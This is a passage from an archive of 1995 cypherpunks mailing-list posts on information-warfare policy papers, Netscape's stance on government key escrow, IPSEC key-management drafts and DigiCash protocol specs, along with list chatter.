REPLAY.COM (Anonymous) Date: Sat, 2 Dec 1995 23:11:29 +0800 Subject: Gibson Warfare Message-ID: <199512021503.QAA14471@utopia.hacktic.nl> URL: http://www.ndu.edu/ndu/inss/strforum/forum28.html Forum, Number 28, May 1995 WHAT IS INFORMATION WARFARE? Martin C. Libicki, National Defense University Is Information War (IW) a nascent, perhaps embryonic art, or simply the newest version of a time-honored feature of warfare? Is it a new form of conflict that owes its existence to the burgeoning global information infrastructure, or an old one whose origin lies in the wetware of the human brain but has been given new life by the information age? Is it a unified field or opportunistic assemblage? Since March 1993, Chairman of the Joint Chiefs of Staff Memorandum of Policy Number 30 (MOP 30) has set forth definitions and relationships that have guided the joint community in its thinking about the related concepts of information warfare and command and control warfare. As these seminal ideas have evolved, their definitions and relationships have changed as well. MOP 30 is under revision, and both higher level policy documents for the Department of Defense and doctrinal publications of the Joint Staff and Services are either in draft form or under revision. In light of the unformed state of these concepts, alternative definitions and taxonomies for twenty-first century warfare are proposed: 1. command-and-control warfare [C2W]; 2. intelligence-based warfare [IBW]; 3. electronic warfare [EW]; 4. psychological operations [PSYOPS]; 5. hackerwar software-based attacks on information systems; 6. information economic warfare [IEW] war via the control of information trade; and 7. cyberwar [combat in the virtual realm]. ... ------------------ URL: http://www.ndu.edu/ndu/inss/actpubs/act003/a003ch07.html Hacker Warfare The hacker attacks discussed here are attacks on civilian targets (military hacker attacks come under the rubric of C2 warfare). Note 41 Although attacks on civilian and military targets share some characteristics of offense and defense, military systems tend to be more secure than civilian systems, because they are not designed for public access. Critical systems are often disconnected from all others -- "air gapped," as it were, by a physical separation between those system and all others. From an operational point of view, civilian systems can be attacked at physical, syntactic, and semantic levels. Here, the focus is on syntactic attacks, which affect bit movement. Concern for physical attacks (see above, on C2W) is relatively low Note 42 (although some big computers on Wall Street can be disabled by going after the little computers that control their air-conditioning). Semantic attacks (which affect the meaning of what computers receive from elsewhere) are covered below, under cyberwarfare. Hacker warfare can be further differentiated into defensive and offensive operations. The debate on defensive hacker warfare concerns the appropriate role for the DoD in safeguarding nonmilitary computers. The debate on offensive hacker warfare concerns whether it should take place at all. In contrast to, say, proponents of tank or submarine warfare, only a few hackers argue that the best defense against a hacker attack is a hacker attack. Whether hacker warfare is a useful instrument of policy is a question that defense analysts and science fiction writers may be equally well placed to answer. Hacker warfare would, without doubt, be a new form of conflict ... ----------------- URL: http://www.ndu.edu/ndu/inss/actpubs/act003/a003ch09.html Cyberwarfare Of the seven forms of information warfare, cyberwarfare -- a broad category that includes information terrorism, semantic attacks, simula-warfare and Gibson-warfare -- is clearly the least tractable because by far the most fictitious, differing only in degree from information warfare as a whole. The global information infrastructure has yet to evolve to the point where any of these forms of combat is possible; such considerations are akin to discussions in the Victorian era of what air-to-air combat would be. And the infrastructure may never evolve to enable such attacks. The dangers or, better, the pointlessness, of building the infrastructure described below may be visible well before the opportunity to build it will present itself. ... The difference between a semantic attack and hacker warfare is that the latter produces random, or even systematic, failures in systems, and they cease to operate. A system under semantic attack operates and will be perceived as operating correctly (otherwise the semantic attack is a failure), but it will generate answers at variance with reality. The possibility of a semantic attack presumes certain characteristics of the information systems. Systems, for instance, may rely on sensor input to make decisions about the real world (e.g., nuclear power system that monitors seismic activity). If the sensors can be fooled, the systems can be tricked (e.g., shutting down in face of a nonexistent earthquake). Safeguards against failure might lie in, say, sensors redundant by type and distribution, aided by a wise distribution of decisionmaking power among humans and machines. GIBSON-WARFARE The author confesses to having read William Gibson's Neuromancer Note 61 and, worse, to having seen the Disney movie "TRON." In both, heroes and villains are transformed into virtual characters who inhabit the innards of enormous systems and there duel with others equally virtual, if less virtuous. What these heroes and villains are doing inside those systems or, more to the point, why anyone would wish to construct a network that would permit them to wage combat there in the first place is never really clear. Why bring up Gibson's novel and the Disney movie? Because to judge what otherwise sober analysts choose to include as information warfare -- such as hacker warfare or esoteric versions of psychological warfare -- the range of what can be included in its definition is hardly limited by reality. ... Possible? Actually, yes. Relevant to national security? Not soon. From anonymous-remailer at shell.portal.com Sat Dec 2 07:23:48 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 2 Dec 1995 23:23:48 +0800 Subject: John Gage's comments at Computer Security Day in Cleveland Message-ID: <199512021022.CAA21819@jobe.shell.portal.com> On Fri, 1 Dec 1995, Dr. Frederick B. Cohen wrote: > John Gave gave an interesting pitch for Java at the CSSI Computer > Security Day sessions in Cl;evelan yesterday (November 30). Among > his comments were: > > Java is not secure - it is "safe" No comment. > He (John Gage) regularly downloads binary executables from the > Internet and runs them on his workstation at Sun - (connected to > the internal Sun network). He downloads executables and runs them while connected to ... Oops, ... no comment. > Sun has terrible physical security - unknown people roam the halls > at night all by themselves. How do they get in the building in the first place?? Someone should think about a MEMBERS ONLY sign or something ... Oops, ... no comment. > In 2 years, you will be able to buy a computer that does more than > a Sparc now does, in a portable package the size of a cell > phone, with more than 30 million bits per second of mobile > bandwidth direct to the Internet, for less than $30. Now this last one could not pass without a deserved comment. How will John have my fingers connect with the cell-phone sized keyboard?? I guess for LESS than $30, I probably shouldn't be moaning and complaining, though ... especially if its energy-star compliant. > -> See: Info-Sec Heaven at URL http://all.net/ > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 Dr. Fred, as usual ... you're a hoot. Your timing is great. And as luck would have it, I've got a Sun open house to go to this Monday for their pre-Christmas shin-dig. The President of Sun Canada, (I think) is supposed to be in attendance. You just gave me some great material to goad him with. Thanks. Even though these social things aren't usually for shop-talk, I think I might just save some of this stuff for use at the punch bowl. (Naah, I wouldn't do that.)-; But it is great material ... and perfect timing ... Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From nobody at REPLAY.COM Sat Dec 2 07:25:28 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 2 Dec 1995 23:25:28 +0800 Subject: Info Foes Message-ID: <199512021516.QAA15201@utopia.hacktic.nl> URL: http://www.ndu.edu/ndu/inss/strforum/z1106.html Strategic Forum THE REVOLUTION IN MILITARY AFFAIRS Martin Libicki, CDR James Hazlett, et al. [Excerpts] DISCUSSION I: STRATEGIC CHALLENGES Those who assess future strategic challenges tend to look to Asian countries, and to categorize competitors as peer, regional, or niche. Asia and the Nation-State Most conference participants believe that, over the next twenty years, the fulcrum of world politics will continue to shift from Europe and its peripheries to the Asia-Pacific region. The period of European dominance produced innumerable wars as various countries challenged each other for power, resources, and sovereignty. With the formation of the European Union and the dissolution of the Warsaw Pact, great power rivalry in particular and the nation-state in general are fading somewhat in importance. The nation-state remains strong in Asia, however. The last fifty years have seen considerable economic progress as various nations have made themselves richer by grasping the secrets of rapid industrialization. This trend, which started in Japan in the 1950s and 1960s, spread to the Tigers in the 1970s, ASEAN countries in the 1980s, and China and perhaps India in the 1990s, has left no Asian country unaffected. Economic growth, however, has not made the nation-state obsolete. To the contrary, the nation-state has been instrumental in creating the internal and external conditions for economic growth. European history suggests that countries, once they taste wealth, will struggle for power. Will Asian countries follow that pattern or demonstrate new models of what the nation-state is capable of? ... Types of Competitors One taxonomy of future threats suggested at the conference is to classify potential competitors as peer, regional, or niche. A peer competitor could challenge our military across the board. A niche competitor would be incapable of doing so, but would strive to inhibit or defeat U.S. intervention by developing capabilities such as primitive weapons of mass destruction, sensor blinders, physical terrorism, information system attacks, psychological operations, or hostage maneuvers. ... DISCUSSION II: OPERATIONAL CHALLENGES Considerable evidence suggests that commercial access to information -- GPS readings, space-based imagery, and Internet data -- could be transformed into military advantage thereby levelling the playing field between ourselves and our potential opponents. Other dual-use technologies, for instance, those that would permit remote piloting of aerial vehicles, permit commercial technologies such as electronic video photography to act as powerful military tools accessible to all (RPVs are made in more than thirty countries). Technologies That Level the Field Does the proliferation in information technologies necessarily negate our current military lead? Information-based warfare creates new vulnerabilities for industrial-age institutions slow to adapt. Because most U.S. logistics facilities and command nodes are not well hidden, they are vulnerable to precision strike. The widespread availability of overhead imagery coupled with GPS integration into weapon systems-- no more than a few years away for countries such as India--poses a serious threat to which our improving defensive measures (e.g., anti-tactical ballistic missiles) will provide only a partial solution . Our own counter-C2 operations are complicated by the rapidly falling cost of bandwidth and redundancy. Even if 90 percent of a bit flow can be interdicted, the remaining 10 percent may suffice for operational uses. Rapid expansion of cellular nodes, particularly through exploitation of commercial space assets, may make targeting and communications denial difficult or impossible. Multiple channels of electronic access will also complicate psychological operations and countermeasures. With the advent of the global information infrastructure, a clever adversary could take advantage of open information systems to enhance its own communications, information, navigation, intelligence, and operational support: examples include GPS, one-meter imagery, weather data, and even CNN. Every year more information with potential military use can be gleaned by anyone from the Internet without leaving fingerprints. How easily can a country's access to the global satellite communications networks be blocked? The coming global information infrastructure will have many points of entry. It will also be difficult to curtail certain services (e.g., global navigation) without denying them to U.S. users or even our own national security establishment. Technologies that Keep Us Ahead The United States, nevertheless, retains an edge in two important areas: space and systems integration. Space systems are relatively difficult to build and although many potential middle-income adversaries can borrow space services from third parties, fewer can own satellites, and far fewer can launch them. Thus the United States will retain a clear edge in the size and sophistication (timeliness and interpretation) of space capabilities, in their adoption and adaptation for military uses, in their augmentation or adaptation for the particulars of future contingencies, and in the assurance of their continuity. The distinctions between data and information, and between information and knowing could also favor U.S. forces. There are vast differences between, for instance, access to meteorological imagery and determining, for instance, that a locus of operations is likely to be fogged in 24 hours hence (a distinction relevant to the Falklands campaign). The art of operational planning is not acquired automatically with the acquisition of computers. Similarly, as sensors proliferate in type as well as numbers, data fusion is likely to become more decisive in future conflicts. ... POLICY RECOMMENDATIONS Two conference threads merit further examination: * U.S. defense policies that make it more difficult for potential competitors to threaten their neighbors and hold off the United States at the same time may be worth pursuing for that fact alone. * If militarily relevant information technologies are everywhere, sophistication at using them may be a better predictor of how challenging a competitor may become for the United States. Therefore, in addition to worrying about how large future foes are (and sizing our own forces accordingly), we should also focus on the potential sophistication of our foes (and develop doctrine accordingly). From markson at osmosys.incog.com Sat Dec 2 07:56:39 1995 From: markson at osmosys.incog.com (Tom Markson) Date: Sat, 2 Dec 1995 23:56:39 +0800 Subject: SKIP source release is out In-Reply-To: <199511301758.JAA08943@bullterrier.incog.com> Message-ID: <9512010919.AA29567@monster.incog.com> > Doug Hughes writes: [ Perry Metzger writes: ] > > >SKIP is a non-standard being pushed by Sun. > > > > Correct me if I'm wrong, but isn't sun trying to make it a standard > > (in competetion with Photuris) ? Doug, you are correct. SKIP is an IPSEC internet draft. Photuris is an IPSEC internet draft. Perry is incorrect in saying that SKIP is a non-standard. Both of the chairs of the IPSEC group have said SKIP is part of the IPSEC working group. Phil Karn (author of Photuris) has also said this. Both SKIP and Photuris are on the standards track. They are, as you indicated, "competing" protocols. > The IETF has many sorts of standards. It explicitly has a way to > standardize things that the IETF doesn't think are a good idea but > which should have the ability to interoperate if you do them. That's true, but SKIP is not in that category. I believe neither SKIP nor Photuris have been declared "mandatory" as of this point. They both have the same status in IPSEC. > My opinion is that it is fairly clear that Photuris is the key > management system people will be using, although it is going to have > to evolve to work with a real network wide certificate database > infrastructure. SKIP isn't going to be the standard. Again, in *your* opinion. No determination has been made that I know of. --tom From adam at lighthouse.homeport.org Sat Dec 2 08:03:07 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sun, 3 Dec 1995 00:03:07 +0800 Subject: DigiCash releases protocol specs! Message-ID: <199512021557.KAA21782@homeport.org> | By popular request, DigiCash is releasing the protocol specs. | | The specs are available at | http://www.digicash.com/ecash/protocol.html | | Please be aware that the doccument is work in progess. More | specifications, including byte level descriptions of the message | format will be added throughout the weekend. And of course, you'll be including a description of how you generate random numbers for use in keys and blindings? I ask only because I didn't see a place for it on the Digicash site. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jmhayes at netcom.com Sat Dec 2 08:23:33 1995 From: jmhayes at netcom.com (Jordan Hayes) Date: Sun, 3 Dec 1995 00:23:33 +0800 Subject: A challenge ... Message-ID: <199512010735.XAA04851@netcom14.netcom.com> I've been challenged to try to find a bank account; I win the challenge if I can wire in $100 to the hidden account. Anyone have any good ideas about how to find an ABA number? From ecarp at netcom.com Sat Dec 2 08:24:34 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 3 Dec 1995 00:24:34 +0800 Subject: Barring access to Netscape Message-ID: <199512010738.BAA17804@khijol> If you want to bar access to your site from a Netscape browser, such can easily be accomplished. If memory serves, every browser, when connecting to a site, exchanges certain information about the client with the server. One can gain access easily to that information. I believe that Netscape uses "Mozilla" as their keyword when exchanging browser-specific information. From bal at martigny.ai.mit.edu Sat Dec 2 08:24:51 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Sun, 3 Dec 1995 00:24:51 +0800 Subject: Netscape 2.0b2 allows for invasion of privacy (fwd) In-Reply-To: <199512010605.BAA18775@homeport.org> Message-ID: <9512010651.AA21856@toad.com> From: Adam Shostack Date: Fri, 1 Dec 1995 01:05:49 -0500 (EST) Cc: cypherpunks at toad.com X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Content-Length: 1647 Sender: owner-cypherpunks at toad.com Precedence: bulk (Btw, Bal, is Netbsd1.1 stable yet? :) Seems stable enough to me, although I've only been running 1.1 since the official release a couple of days ago. I was able to trigger Scott Westin's LiveScript with a Linux Netscape binary in 1.1's Linux compatibility mode. That's stable enough for me. Oh, and PGP 2.6.2 built right out of the box :-) --bal From alano at teleport.com Sat Dec 2 08:25:10 1995 From: alano at teleport.com (Alan Olsen) Date: Sun, 3 Dec 1995 00:25:10 +0800 Subject: "Got a subpoena?" Message-ID: <2.2b7.32.19951201064716.008989b0@mail.teleport.com> At 11:50 AM 11/30/95 -0500, you wrote: >To use the most obvious example, different remailer operators turn >different levels of logging on. So one operator will say "Yes, I am >obligated to fully comply with your subpoena, officer. Here are the >full logs for the last six months." And another will say "Yes, I am >obligated to fully comply with your subpoena, officer. However, I >keep no logs at all of the mail sent through my remailer. Drag, huh?" Sounds like we need a version of Mixmaster for the logs... | Its Log! Its Log! Its big, its heavy, its erased| alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | | From ecarp at netcom.com Sat Dec 2 08:27:17 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 3 Dec 1995 00:27:17 +0800 Subject: Netscape gives in to key escrow Message-ID: <199512010750.BAA18796@khijol> > Date: Fri, 1 Dec 1995 04:40:23 -36000 > From: Matt Miszewski > Subject: Re: Netscape gives in to key escrow > To: sameer > Cc: Jeff Weinstein , cypherpunks at toad.com, > jsw at tera.netscape.com > On Thu, 30 Nov 1995, sameer wrote: > > > Jeff: If Netscape comes out in favor of GAK, will you leave? > > (Wait until February, at least, of course..) You don't have to answer > > that to me, or the list, just think about it, and answer it for > > yourself. Do you think "anyone else" there would leave, as you say > > below that they don't want to go down history, etc... > > > > While this would go over well in the press if handled right please let > everyone remember that Jeff is a real person with bills to pay and food > to put on at least his own table. Now if someone out there with their > own business is willing to match his politics with his purse and offer > Jeff a job at the same level if he *decides* to leave in the midst of GAK > flak... If Jeff decided to leave, I don't think he'd have much trouble getting something else - I'd be surprised if he wasn't employed the next day. Of course, if Jeff's got any stock in Netscape, he'd be nuts to leave - unless he values his principles more than he values his stock. No insult intended. From traye at ix.netcom.com Sun Dec 3 00:35:05 1995 From: traye at ix.netcom.com (David S McDaniel ) Date: Sun, 3 Dec 95 00:35:05 PST Subject: Add to List Message-ID: <199512030834.AAA06903@ix13.ix.netcom.com> I would like to be added to your mailing list for the cypherpunks. Thank you very much. From nobody at REPLAY.COM Sat Dec 2 08:41:30 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 1995 00:41:30 +0800 Subject: Four Info Threats Message-ID: <199512021625.RAA16934@utopia.hacktic.nl> URL: http://www.ndu.edu/ndu/inss/strforum/forum35.html Forum, Number 35, July 1995 THE NEXT ENEMY Martin C. Libicki, National Defense University [Excerpts] The Cold War offered military planners considerable strategic clarity the threat was known, and the problem was generating a force structure of sufficient size and sophistication to counter it. Today's military threats are varied and, for the most part, well below the level that even a shrinking U.S. force can handle comfortably. Threats ten to twenty years out, however, must be taken seriously because of the long time required to complete a major systems acquisition; to develop, test, and institutionalize new doctrine; and to accomplish the organizational innovations necessary to use both effectively. Future threats may be divided into four categories: peers, bullies, terrorism, and chaos. ... Peers Few planners think it likely that the next twenty years will see a reemergence of a nation that can pose a challenge to U.S. military power as broadly as the Soviet Union did. However, at least two countries (Russia and China) could conceivably be peer adversaries at the strategic level of nuclear weapons, space, and information systems. ... Another avenue of future competition may be information warfare. Can or should the United States hold other nations' participation in the world economy at risk? The United States might be able to shut down another nation's banking system but not without risk of collateral damage to the global banking system. Can physical war be replaced by a survival contest among rival information systems under attack? Perhaps the United States should concentrate on developing defensive systems. The United States has the biggest stones, but also the most glass in its house. ... A world of peer strategic competition would drive the military in familiar directions towards: nuclear forces, satellites and other long-range warning systems; tactical ballistic missile defense systems (including for allies); perhaps strategic defense systems and space attack systems; air defense in general; information warfare and security; and robust command-and-control. Bullies If the circumstances and logic of the Bottom Up Review hold true for two more decades, U.S. armed forces will be sized and structured primarily to engage in two simultaneous major regional contingencies (MRCs). The usual suspects in such MRCs (e.g., Iran, Iraq, North Korea) are presently unsophisticated rogue states that aspire to nuclear weapons and delivery systems. Conference participants believe that U.S. forces could cope with the challenges of future conventional warfare, even if force levels continue to diminish. However, two events would make the United States rethink its strategy nuclear weapons proliferation, and the sophisticated exploitation of world technology markets. ... Alternatively, an MRC opponent may be able to avoid going to the nuclear threshold by a strategy which uses smart munitions, commercial command-and-control, and a variety of surveillance technologies (e.g., unmanned aerial vehicles, third-party satellite surveillance) to exact damaging casualties on U.S. forces. ... Against a sophisticated regional foe, the United States might not want to use platforms at all but rely on a combination of stand-off attack forces, and information-based warfare assets (for giving targeting data to local coalition partners), coupled with special operations forces used for liaison and other tasks. Terrorism Largely because of the limited capability that classical military instruments have in coping with terrorism, conference participants kept returning to the threat that it may pose to U.S. national security. Incidents may range from the use of conventional explosives (e.g., what if the van in the World Trade Center explosion had been parked in a more vulnerable spot), to nuclear or chemical weapons, biological agents, and their analogue in cyberspace information warfare. Devices that can cause terror are getting easier to manufacture and transport and harder to detect. The equipment for replicating biological agents is inexpensive; the equipment for replicating computer agents is even cheaper. Many otherwise third-world Asian nations have very large computer-literate cohorts that make them potential information warfare powers. ... Chaos Over the next two decades, states will continue to fail. Some failures may create circumstances (e.g., refugees, malcontents, and environmental damage) which topple other states. To cope, the United States may need a robust capability to conduct peace and relief operations. ... A concentration on peace operations may also be a good reason to expand foreign military interactions. Improving interoperability with future coalition partners carries many advantages. Yet, above a certain technological level of integration, the risk of exposing information on U.S. capabilities to what may be temporary allies has to be carefully managed. If countering chaos were the primary mission of the U.S. armed forces, then they would have to become lighter and more mobile (because states often fail with little warning, and the United States usually responds only in extremis). The Army and Marine Corps would have larger roles, while the Navy and Air Force would focus on lift. As emergency operations become the norm, some functions assigned to reserve units may have to be shifted to active ones (e.g., to allow civil affairs assets to be used more frequently). From gimonca at mirage.skypoint.com Sat Dec 2 09:07:39 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Sun, 3 Dec 1995 01:07:39 +0800 Subject: Applied Cryptography MPLS Book Release Message-ID: Did I mention that Bruce Schneier and Ms. Cooper are charming hosts with an excellent caterer? Probably not, with all the Netscape/GAK hoo-hah going on. Well, if you'll excuse me for posting thanks a couple of days late, thanks for an excellent time. It was good to see some of the local folks in person again. From froomkin at law.miami.edu Sat Dec 2 09:11:21 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 3 Dec 1995 01:11:21 +0800 Subject: FW: websurfer 4.6 (fwd) Message-ID: so much for compatibility....guess I'm sticking with netscape for now. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. ---------- Forwarded message ---------- Date: Fri, 1 Dec 95 16:49:34 PST >From: Netmanage Technical Support To: Michael Froomkin Subject: FW: websurfer 4.6 Hello, Thank you for emailing NetManage Technical Support. WebSurfer 4.6 was designed to work on Winsock 1.1 compliant systems. Since you are running Winsock version 2.0 this may be the reason for the application not working. We will report this to Engineering so hopefully in a future release WebSurfer might be able to support this new Winsock version. Thank you for considering Chameleon WebSurfer, Support at netmange.com == [earlier, I had said:] won't start on my pentium 100 w/ 20Mb running qemm 7.04, windows 3.11, winsock 2.0 rev B on a novell 3.x LAN. Netscape runs fine. This might help: Trumpet Winsock Version 2.0 Revision B Copyright (c) 1993,1994 by Peter R. Tattam All Rights Reserved. THIS IS AN UNREGISTERED SHAREWARE VERSION FOR EVALUATION ONLY. Ethernet address = 00:00:F4:D2:64:D3 WINPKT packet driver located on vector $66 IP buffers = 32 Performing bootp...Bootp successful My IP = 129.171.188.92 netmask = 255.255.255.0 gateway = 129.171.188.1 Task WEBSURF(22E7) did not call WSACleanup. Task WEBSURF(38EF) did not call WSACleanup. -----------------End of Original Message----------------- If responding to a previous message please include the original for our reference. To ensure a faster reply be sure to reply to 'support at netmanage.com' and not to individual sender of messages. -- /\ **********/@@\ ********************************* \__/ NetManage Inc. W AA W Home of Chameleon TCPIP for Windows |__AYA__/ TCPIP Apps for Windows and NT AXXV VXXV W VUV W Technical Support (408)973-8181 |_/ V \_/ __ Fax (408)973-8272 \ [_ \ \_____/ MIME enclosures are OK gopher server: gopher.netmanage.com www: http:/www.netmanage.com For a list of current NetManage products use WebSurfer and go to: http://www.netmanage.com:80/netmanage/products/upgrade.html Serendipity 11/20/95 10:36:42 AM This message was sent by Chameleon From froomkin at law.miami.edu Sat Dec 2 09:15:58 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 3 Dec 1995 01:15:58 +0800 Subject: DigiCash releases protocol specs! In-Reply-To: <9512012324.AA01808@ch1d157nwk> Message-ID: Absolutely. Now if I can just get Hal to translate these into English for me.... On Fri, 1 Dec 1995, Andrew Loewenstern wrote: > > By popular request, DigiCash is releasing the protocol specs. > > Three cheers to DigiCash, Mark Twain, and Lucky! > > andrew > A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From sameer at c2.org Sat Dec 2 09:32:27 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 01:32:27 +0800 Subject: lance's netscape-gak page Message-ID: <199512021718.JAA25725@infinity.c2.org> Lance asked me to announce his page to the list, if he fell asleep. Looks like he hasn't announced it, so here's the announcement. Lance's netscape-GAK page is available from his homepage at http://www.obscura.com/~loki/ the graphic is nice. ;-) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From jsw at netscape.com Sat Dec 2 09:41:14 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 1995 01:41:14 +0800 Subject: Info on Netscape's key escrow position Message-ID: <199512020701.XAA01919@ammodump.mcom.com> I had lunch with Jim Clark today, and explained the furor that was currently going on in cypherpunks and elsewhere. After lunch he sent me the e-mail that I've attached below to pass along. I think the gist of it is that if governments require key escrow, we will have to do it in order to sell our products with encryption into those countries. We've actively lobbied against the government's proposal through our participation and support of industry efforts by the ITAA, BSA, SPA and others. Next week we will be sending two representatives to the NIST key escrow conference in DC. In preparation for that meeting we have been formulating an official company position on key escrow and export restrictions. Phil, myself, and other folks with cypherpunk leanings are involved in writing the policy statement. We are planning on taking a firm position against the government's key escrow proposals. Some time next week we will be posting our statement publicly, and will welcome your comments on it then. After the NIST meeting we will also be talking to folks in congress and the white house about our position, looking for help in getting the current export limitations removed. We will also be looking for help in getting the government's position on export controlled FTP sites clarified so that we can make the US version of the Navigator with 128-bit crypto available for download by those people who are legally allowed to use it. We don't have any plans to stop doing separate US and export versions of our software. As long as our customers want strong crypto and the government lets us sell it, I think we will keep doing it. --Jeff Jim Clark wrote: > > I made some pragmatic comments. > > I said that if we are to use this encryption technology in business, we must > have a better solution than to limit keylength or put keys in escrow. All > governments of the world have a valid concern about terrorism and other > activities of concern to the security of their nations. All of them will > continue to restrict our ability to provide products to their markets unless > we build in some mechanism that allows them to legally access > information that is in the interest of their national security. (We obviously > cannot be involved in determining what is legal by the laws of that country.) > This is not just a US government problem. Until recently, France did not even > allow us to sell products with 40-bit keys, much less 128-bit keys. > > A lot of ordinary citizens are rightly concerned about their own privacy. I > am one of them. I do not want the government to snoop on me, but in fact the > government, through the FBI, can now tap my phone without my knowing it by > simply getting sufficient evidence that I am conducting illegal activities, > then presenting this evidence to a court to get permission. I have no say in > the matter. > > If we as a company were to take the position that in no case will we allow > a government to get access to our encrypted messages, or refuse to allow > key escrow with our products, the governments of the world will quickly put > us out of business by outlawing the sale of our products in their countries. > The fundamental issue is how do we accommodate the requirements of governments, > while protecting our rights as citizens. > > None of this represents the position of Netscape with respect to what we > will do. But if we do not come up with a solution to this problem that is > acceptable to each government, we will not be able to export our products, > except with a short key length (e.g. 40 bit keys), and that will not be > acceptable to corporate customers in other countries. They will create their > own solution, and we will not be able to sell to a larger world market. In > fact, we could even be ordered by our own government to establish a key > escrow system for its use inside the US. > > Ironically, anyone in the US may import unbreakable encryption technology from > another country -- we just cannot sell it back to them. No one ever accused the > government of being rational. > > I chair an industry group called the "Global Internet Project", with members > from almost twenty companies, including companies from Asia and Europe. This > was the central issue we all agreed upon this morning, and we are putting > together a policy statement whose purpose is to educate lawmakers on the > importance of quick resolution of this matter. > > Thanks for your concern. Let me know what you like and don't like. Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From nobody at futurenet.co.uk Sat Dec 2 09:41:43 1995 From: nobody at futurenet.co.uk (FutureNet Server) Date: Sun, 3 Dec 1995 01:41:43 +0800 Subject: FutureNet Registration Message-ID: <9512012209.AA22388@webserv.futurenet.co.uk> Congratulations, you have just sucessfully registered for FutureNet, Europe's most popular e-zine. Your registration details are: Username: cypherpunks Password: cypherpunk You should bookmark a page within FutureNet so that you can revisit the site without having to type in your username and password again. The URL for the FutureNet homepage is: http://www.futurenet.co.uk/,cypherpunks,cypherpunk,/menu.html Keep this message somewhere safe, it contains your FutureNet reader identification details. If you have any problems accessing FutureNet, send mail to webmaster at futurenet.co.uk. From tcmay at got.net Sat Dec 2 09:48:03 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 1995 01:48:03 +0800 Subject: Why Netscape employees should not leave... Message-ID: At 8:33 AM 12/2/95, sameer wrote: >> >> So, for a 15% reduction in salary and 30 days of job search, is it worth it? > > 30 days? in silicon valley? you *must* be joking. (i suppose >the market for good net-folks isn't as big over on the right coast.) Just a minor clarification. I don't speak for any of the Netscape employees here (nor am I encouraging them to leave...they cay do *more* within Netscape than merely be resigning in some sort of protest). The _salary_ figure is not the key issue. Stock options are. Their stock options were almost certainly priced before the big run-up in price these last few months, and most likely priced at the IPO price or even lower. It is quite likely that these stock options are worth far, far more than salary. True, other companies offer stock options, but their Netscape options are already "in the money" by a wide margin, which is an incredible incentive to stick around. I'm critical of Netscape, like others are, on various issues. But I sure do hope we never turn this criticism into suggestions that Jeff and the other Netscape folks here should quit in protest. That smacks too much of "you're working for the war machine!" stridency. (Next we'll be having people dump buckets of blood over piles of Netscape Navigator at Fry's.) I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal on the actual issue of whether Netscape will build a U.S.-supported GAK (as opposed to offering GAK for the Iraqis or French). I await with interest the clarification of the anti-GAK stance that Jeff alluded to. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jya at pipeline.com Sat Dec 2 09:49:36 1995 From: jya at pipeline.com (John Young) Date: Sun, 3 Dec 1995 01:49:36 +0800 Subject: EXO_ner Message-ID: <199512021734.MAA03028@pipe4.nyc.pipeline.com> SenXon and The Washrag blow today about which has the most to be ashamed of and hide from the filthy lingerie leering republic. EXO_ner (sheer kb) From norm at netcom.com Sat Dec 2 10:51:42 1995 From: norm at netcom.com (Norman Hardy) Date: Sun, 3 Dec 1995 02:51:42 +0800 Subject: Netscape gives in to key escrow Message-ID: The Netscape browser chose the wrong time, this morning, to tell me that my demo copy was about to expire. From pcw at access.digex.net Sat Dec 2 10:58:10 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 3 Dec 1995 02:58:10 +0800 Subject: Why Netscape employees should not leave... Message-ID: Of course given the great market success of the other Clipper products, I wouldn't be counting my stock options before they hatch. Browsers are not that complicated. Nor are HTTP servers. A US-only, truly secure system would be easy to build. SSL is designed to be expanded to include new algorithms. It's pretty good in that respect. If I were considering launching a Clipperized Browser, I would really consider the negative effect it would have on its marketability and its stock price. From unicorn at polaris.mindport.net Sat Dec 2 11:19:04 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 3 Dec 1995 03:19:04 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C016E6.6264@netscape.com> Message-ID: On Sat, 2 Dec 1995, Jeff Weinstein wrote: > Black Unicorn wrote: > > > > On Fri, 1 